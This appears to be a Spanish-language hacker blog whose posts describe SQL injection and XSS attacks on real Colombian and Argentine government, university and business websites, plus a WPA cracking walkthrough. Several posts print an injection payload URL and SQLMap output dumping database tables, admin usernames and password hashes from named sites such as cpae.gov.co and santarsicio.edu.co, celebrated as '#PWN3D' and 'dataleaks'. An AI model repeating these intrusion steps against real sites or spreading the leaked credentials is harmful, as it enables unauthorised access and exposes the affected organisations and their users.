¿Te Ha Gustado Este Blog?

Tu opinion es muy importante, entra y deja tu voto 🙂 salu2 a todos

Anuncios

Descubriendo Vulnerabilidad Con Nessus Scan by R4z0r_

wall-arrows

Bueno Amigos, en este post les mostrare lo PODEROSO que es NESSUS. ayer estaba navegando por internet y me encuentro con una pagina web que ofrece soluciones informaticas, al parecer es de ingenieros de la universidad donde me estoy formando, por ende me doy cuenta que es de la misma ciudad donde vivo :)..

me dio curiosidad ver la web y hacer unos testeos basicos explorando las secciones de la pagina web buscando combinaciones de parametros que me dieran paso a una vulnerabilidad de SQL.

Solamente encontre la siguiente combinacion:

https://www.target.com/publicaciones/index.php?id_publicacion=3

al hacerle el test simple de la comilla, esta nos devuelve el siguiente mensaje:

En este momento no se puede acceder a la informacion, por favor intentelo mas tarde.

Captura de pantalla de 2013-07-06 09:08:36

No es ningun error de MySQL pero aun asi pase la URL por SQLMAP para intentar hacer la inyeccion. Como era de esperarse la web en esa seccion NO era vulnerable. 😦

pues bien, me di cuenta que la pagina web SI estaba diseñada en lenguaje PHP y manejaba SQL, y que al parecer tenian indexado las secciones de la pagina para no mostrar dichas combinaciones (al parecer las vulnerables) entonces recuerdo que tengo junto a mi, un poderoso Scanner de Vulnerabilidades [NESSUS] con el cual queria retificarme de que enrealidad existiera dicha Vulnerabilidad de SQL Injection.

Pues Bien! despues de esperar que el analisis terminara, los resultados fueron los siguientes:

Captura de pantalla de 2013-07-06 08:57:00

LOS RESULTADOS SON POSITIVOS PARA EL AUDITOR DE SEGURIDAD QUE REALIZE EL PENTEST, PERO NEGATIVOS PARA LOS CEO’S DE LA EMPRESA 😦

quize mirar mas acerca de ese informe de la vulnerabilidad critica de SQL INjection que aparece en el reporte:

Captura de pantalla de 2013-07-06 09:01:25

como vimos, aparte de que nessus nos indico acerca de el o las vulnerabilidades nos muestra la ruta de donde el sistema posee dicha vulnerabilidad, en este caso la que nos interesa la Injeccion SQL.

procedo a retificar de que si exista dicha vulnerabilidad, me dirigo al link:

https://www.target.com/2010/cliente_detallado.php?id_cliente=’+convert(int,convert(varchar,0x7
b5d))+’

Captura de pantalla de 2013-07-06 09:04:28

efectivamente arrojo el error de MySQL :D. ahora ya teniendo la URL vulnerable, solo me quedaba explotarla, entonces ahi si la pase por SQLMAP.

Sacando Nombres de Bases de Datos:

Captura de pantalla de 2013-07-06 09:15:38

ahora las tablas de dicha base de datos:

Captura de pantalla de 2013-07-06 09:20:23

ahora las columnas 🙂

Captura de pantalla de 2013-07-06 09:23:25

y por ultimo… los datos :D!!

Captura de pantalla de 2013-07-06 09:25:19

ENHORABUENA!!!

HEMOS CONSEGUIDO LOS DATOS DEL ADMINISTRADOR. TODO LO QUE PODEMOS LLEGAR A HACER GRACIAS A ESTE HERMOSO SOFTWARE DE ANALISIS DE VULNERABILIDADES, QUE NO SOLO SIRVE PARA APLICACIONES WEB , SINO QUE FUNCIONA EN ANALISIS DE REDES INTERNAS O EXTERNAS.

BIEN, POR ULTIMO LES RECOMIENDO SI VAN A REALIZAR UN TEST DE INTRUSION, TENER ESTA PODEROSA ARMA DE INFORMATION GATHERING, PUESTO QUE NOS ARROJA UNA SERIE DE DESCUBRIMIENTOS QUE PUEDEN SER USADOS EN CONTRA DEL SISTEMA AUDITADO.

YA AVISE A LOS ADMINISTRADORES ACERCA DE DICHOS FALLOS, Q NO SOLO ES ESTE DE SQL, SINO OTRO COMO UN BLIND SQL, XSS, AUTENTICACION DE FORMULARIOS EN TEXTO PLANO .. ETC…

AUNQUE EL PENTEST NO QUEDO EN ESTA SIMPLE EXPLOTACION DE USERS Y PASS DEL ADMIN POR MEDIO DE LA SQL INJECTION, SOLO LES QUERIA MOSTRAR LO PODEROSO QUE ES NESSUS. GRACIAS TENABLE! 😀

HASTA PRONTO, SALU2 A TOD@S (y)

by R4z0r_

@Diego_Asencio on twitter

@DiegoAsencio on Taringa!

XSS al Ministerio de Ciencia y Tecnologia e Innovacion Productiva de La Republica Argentina by R4Z0r

Pues Bien, en esta corta entrada, muestro el XSS reflejado que hay en el buscador de la web, el cual permite ejecutar lineas de codigo. No es nada nuevo que este tipo de errores existan en portales de diferentes gobiernos Latinoamericanos, un error simple que puede llevar a algo mas que un Mensaje de Alerta.

XSSmincyt_gov_ar

Salu2 a Tod@s

Error de SQL en la pagina web de la Universidad Javeriana de Colombia

bnner1.jpg

BIEN, ESTA TARDE ME ENCONTRE CON UNA SECCION DE LA WEB DE LA UNIVERSIDAD JAVERIANA DE COLOMBIA, ME LLAMO LA ATENCION VER QUE CONTENIA ARCHIVOS .PHP Y DECIDI IR EN BUSCA DE UNA COMBINACION DE PARAMETROS ID. DESPUES DE EXPLORAR LAS SECCIONES DEL PORTAL ME ENCUENTRO CON UNA, ENTONCES HAGO EL TEST DE LA COMILLA SIMPLE, Y BINGO! NOS HA ARROJADO UN ERROR DE SQL… VER AQUI:

ERRORENLAJAVERIANA

YA CON ESTE ERROR PODEMOS INTENTAR HACER LA FAMOSA INYECCION SQL E INTENTAR HABER QUE SE PUEDE HACER CON ESE FALLO DE SEGURIDAD QUE PRESENTA LA MEJOR UNIVERSIDAD DE COLOMBIA.

BIEN, SI SE DEJA HACER ALGO MAS EL POST CONTINUARA, AUNQUE LA INTENCION DE ESTE CORTO POST ES MOSTRAR SIMPLEMENTE EL ERROR ARROJADO, SIN INTENCION DE DAÑAR LA INTEGRIDAD NI LA SEGURIDAD DE NADIE.

SALU2 A TODOS

@R4Z0R_BL4CK
@insid30utsid3

#ColombianCyberArmy

“Hackear Redes WPA con Fern Wifi Cracker” by R4z0r

Hola a todos, en este corto post explicare como utilizar la herramienta Fern Wifi Cracker. Segun lo que he leido acerca de esta herramienta, Fern Wifi Cracker es el mismo Aircrack pero en modo grafico. Como Bien sabemos Aircrack es una herramienta desarrollada en Python para la explotacion de Vulnerabilidades en Redes Inalambricas que nos permite intentar “hackear” una contraseña de una red wifi.

Pues Bien, aca mostrare como usar Fern para decifrar claves WPA-PSK. En la demostracion me ‘auto-hackearé’; es decir iré en busca de mi propia clave de mi red inalambrica (para no incurrir en delito alguno).

1) Abrimos La Herramienta (Fern Wifi Cracker)

2) Seleccionamos la Interface (wlan0)

Y Clieckeamos donde dice: “Scan for Access Points”

3) Nos Apareceran las Redes Que Se hayan detectado durante el Scanneo de Puntos de Acceso. En Este Caso Aparecio Una Red WPA (Mi Access Point Victima). Clikeamos

4) Nos Aparecera Algo como esto con la informacion de la red

Essid
Bssid
Channel
Power
Encryption

Y Donde Dice “Probing Access Point” le damos Browse para escojer el diccionario a utilizar.

Aparecera algo como esto:

Escojemos el diccionario. que para este ejemplo de prueba, utilizare “diccionarioprueba.txt” que fue uno corto que arme para no tardar demasiado tiempo.

5) Si ya hemos hecho todo bien hasta el anterior paso, entonces ya hemos desconectado o desautenticado a nuestra victima, solo nos quedaria esperar que la victima o el cliente se conecte nuevamente a la red wifi. como yo soy el atacante pero tambien soy la victima entonces proseguire por autenticarme en la red.

Nota: es necesario que haya por lo menos un cliente conectado a la red que queremos auditar, puesto que necesitamos capturar el trafico generado por el cliente para poder llevar a cabo la desautenticacion que nos permitira capturar el ‘handshake’.

6) Tambien es necesario que una ves hayamos desconectado al cliente (victima) este se conecte nuevamente a la red wifi.

7) Si el Cliente ya se conecto nuevamente a la red entonces procedemos a darle click al boton que dice “Attack”. Si Aun no se ha conectado entonces aparecera un error, y tocaria esperar hasta que suceda ese evento, ya que es necesario para continuar

8) Una ves hayamos clickeado en “Attack” esperamos mientras que se captura el handshake y la tool busca la clave en el diccionario que escojimos…

como vimos despues de esperar que el diccionario hiziera las comparaciones y como puse la contraseña correcta dentro del diccionario nos arrojo el resultado que esperabamos. ¡LA CLAVE O CONTRASEÑA DE MI RED WIFI! ahora miraremos que la clave es la correcta…

9) Damos click en “Propiedades”

10) Vamos donde dice “Key” y miramos la contraseña. como vemos las contraseñas coinciden

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Bien Esto fue todo, como observamos es relativamente facil obtener una contraseña WPA-PSK (claves precompartidas) con esta herramienta que esta incluida en BackTrack 5 y tambien en BugTraq.

Lo Unico Necesario para poder llevar a cabo este procedimiento con exito es que haya un cliente activo que este conectado, y un buen diccionario para poder tener suerte a la hora de “crackear” la password. Ahi que tener en cuenta que el tiempo de espera depende de la debilidad de la contraseña, puesto que por lo general los diccionarios a usar son muy extensos y el tiempo de comparacion de claves se demorara tanto como sea el tamaño del diccionario, puede tardar minutos, horas, dias, meses e incluso años!.

____________________________________________________________________

By @R4z0r_Bl4ck

of @insid30utsid3

#ColombianCyberArmy

Consejo Profesional de Administracion de Empresas de Colombia www.cpae.gov.co #PWN3D by r4z0r

En la Mañana de hoy 1 de junio, comenzando nuevo mes, me encuentro con un pequeño error, quizas uno de los mas comunes en las aplicaciones web de PHP, el SQL injection… esta ves la pagina web http://www.cpae.gov.co/ Consejo Profesional de Administracion de Empresas Fue en la que observe el error de SQL al colocarle la comilla simple.

entonces decidi pasar la URL donde genero el error por SQLMap para ver hasta que punto podia llegar con esta vulnerabilidad en el sitio web, como era de esperarse arrojo nombres de bases de datos:

available databases [2]:
[*] cpaegov_cpae
[*] information_schema

entonces segui por mirar las tablas de la base de datos (cpaegov_cpae)

Database: cpaegov_cpae
[19 tables]
+——————+
| Control_Usuarios |
| CuentaAmigo |
| Estadisticas |
| Frm_1 |
| Frm_2 |
| Frm_5 |
| Grupos |
| Tracking |
| Usuario |
| adcnt_conf |
| auditoria |
| base_mail |
| disposiciones |
| frm_conf |
| frm_list |
| frm_menu |
| site_web |
| tarjetasp |
| usuarios |
+——————+

como vemos ahi varias tablas que contienen datos importantes como lo son los correros, users, pass de usuarios vinculados al portal, y quizas entre esas tablas esten las que interesan mas que son los datos del webmaster o administrador :D!

bien segui ahora por orden de tablas sospechosas:

Database: cpaegov_cpae
Table: Control_Usuarios
[7 columns]
+————-+——————+
| Column | Type |
+————-+——————+
| activo | tinyint(4) |
| causal | int(10) unsigned |
| comentarios | varchar(10000) |
| fecha_mod | datetime |
| id_ctrl_uss | int(10) unsigned |
| id_uss | int(10) unsigned |
| tipo | varchar(150) |
+————-+——————+

y un muestreo de los datos de algunas de las columnas:

Database: cpaegov_cpae
Table: Control_Usuarios
[12 entries]
+——–+————-+——+——–+
| id_uss | id_ctrl_uss | tipo | activo |
+——–+————-+——+——–+
| 169 | 172 | 0 | 0 |
| 2 | 2 | 0 | 1 |
| 3 | 3 | 1 | 1 |
| 4 | 4 | 1 | 1 |
| 5 | 5 | 0 | 0 |
| 6 | 6 | 0 | 0 |
| 7 | 7 | 0 | 0 |
| 8 | 8 | 1 | 1 |
| 9 | 9 | 1 | 1 |
| 10 | 10 | 1 | 1 |
| 138 | 138 | 1 | 1 |
| 12 | 12 | 0 | 0 |
+——–+————-+——+——–+

__________

Database: cpaegov_cpae
Table: Usuario
[8 columns]
+————+————–+
| Column | Type |
+————+————–+
| Aso | smallint(6) |
| contrasena | varchar(255) |
| correo | varchar(255) |
| Exa | smallint(6) |
| grupo | int(11) |
| id_usuario | int(11) |
| Junta | smallint(6) |
| usuario | varchar(255) |
+————+————–+

y los datos de las columnas:
Database: cpaegov_cpae
Table: Usuario
[2 entries]
+————+———+————+——————————————+
| id_usuario | correo | usuario | contrasena |
+————+———+————+——————————————+
| 1 | | admincpae | e6e004f2c68891b2df1515e971517428e3c33e50 |
| 2 | | admincpae1 | af631d104bc0fdacbce4d23aae3b11b2 |
+————+———+————+——————————————+

____

Database: cpaegov_cpae
Table: usuarios
[7 columns]
+—————+—————+
| Column | Type |
+—————+—————+
| clave | text |
| correo | varchar(50) |
| fechacreacion | datetime |
| localizacion | enum(‘S’,’N’) |
| nombre | varchar(15) |
| permiso | int(1) |
| prg | int(1) |
+—————+—————+

Database: cpaegov_cpae
Table: usuarios
[2 entries]
+——————————————+———+————–+
| clave | correo | localizacion |
+——————————————+———+————–+
| 18792a1a2048765f12431a2138327ec7411ed19d | | |
| e6e004f2c68891b2df1515e971517428e3c33e50 | | |
+——————————————+———+————–+

COmo vimos, de un simple error generado por la comilla simple sacamos
bastantes datos y los que hizo falta por sacar de una manera muy simple, sencilla y rapida. 🙂 #happyhacking

@r4z0r_bl4ck
@insid30utsid3
#ColombianCyberArmy

santarsicio.edu.co 0wn3d by r4z0r [dataleaks]

pwned-300x224

TARGET: http://santarsicio.edu.co

DB: coleg13_descargas

TABLA USERS: usuarios

COLUMNAS:

user: admin2011
pass: 82cee366389f4b1b4ec74930db75a2bc

#happyhacking

#inside0utside

#colombian cyber army

#r4z0r_bl4ck